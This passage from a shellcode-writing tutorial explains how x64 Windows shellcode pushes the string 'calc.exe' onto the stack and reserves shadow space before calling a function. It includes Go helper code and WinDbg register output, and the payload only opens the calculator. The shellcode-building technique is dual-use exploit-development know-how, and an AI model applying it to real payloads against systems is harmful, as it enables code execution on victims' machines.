Line 11: Reserve the 0x20 bytes of argument storage space (shadow space) plus 8 bytes for stack alignment

Line 12: Finally calling the function.
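The byte-order and 8-byte-chunk rules from Line 6 are easy to get wrong by hand. Here is a hedged Go sketch (pushImmediates is a hypothetical helper) that null-terminates the string, pads it to whole qwords, and returns the little-endian immediates in the order they must be pushed:

```go
package main

import (
	"encoding/binary"
	"fmt"
)

// pushImmediates splits s into 8-byte little-endian immediates, in the order they
// must be pushed so the string ends up contiguous and null-terminated at rsp.
func pushImmediates(s string) []uint64 {
	buf := append([]byte(s), 0) // null terminator
	for len(buf)%8 != 0 {
		buf = append(buf, 0) // pad to a whole number of qwords
	}
	var chunks []uint64
	for i := 0; i < len(buf); i += 8 {
		chunks = append(chunks, binary.LittleEndian.Uint64(buf[i:i+8]))
	}
	// The stack grows down, so the last chunk has to be pushed first.
	for i, j := 0, len(chunks)-1; i < j; i, j = i+1, j-1 {
		chunks[i], chunks[j] = chunks[j], chunks[i]
	}
	return chunks
}

func main() {
	for _, q := range pushImmediates("calc.exe") {
		fmt.Printf("mov rcx, 0x%x; push rcx;\n", q)
	}
}
```

For "calc.exe" this yields 0 followed by 0x6578652e636c6163, matching the template; the template uses xor rcx, rcx; for the zero qword, which is shorter than moving a zero immediate.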

0:010> r rcx,rdx
rcx=0000001ea51ff9d8 rdx=0000000000000001
0:010> da 0000001ea51ff9d8
0000001e`a51ff9d8  "calc.exe"

Just before calling the function, this is what we see in rcx and rdx, which is exactly what we expect.
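The sub rsp, 0x28 on Line 11 can be checked against the rcx value above: lea rcx, [rsp] copied rsp, so rsp was 0x1ea51ff9d8 at that point. A small Go sketch of the rule (callAdjust is a hypothetical helper): reserve 0x20 bytes of shadow space and round down so that rsp is 16-byte aligned at the call instruction.

```go
package main

import "fmt"

// shadowSpace is the 32 bytes the caller reserves for the four register arguments.
const shadowSpace = 0x20

// callAdjust returns how many bytes to subtract from rsp so that the callee gets
// its shadow space and rsp is 16-byte aligned at the call instruction.
func callAdjust(rsp uint64) uint64 {
	return shadowSpace + rsp%16
}

func main() {
	rsp := uint64(0x1ea51ff9d8) // rsp copied into rcx by `lea rcx, [rsp]`
	adj := callAdjust(rsp)
	fmt.Printf("sub rsp, 0x%x -> rsp = 0x%x\n", adj, rsp-adj) // sub rsp, 0x28 -> rsp = 0x1ea51ff9b0
}
```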

Stepping over the function should launch a calc.exe process

The whole shellcode template can be found here.
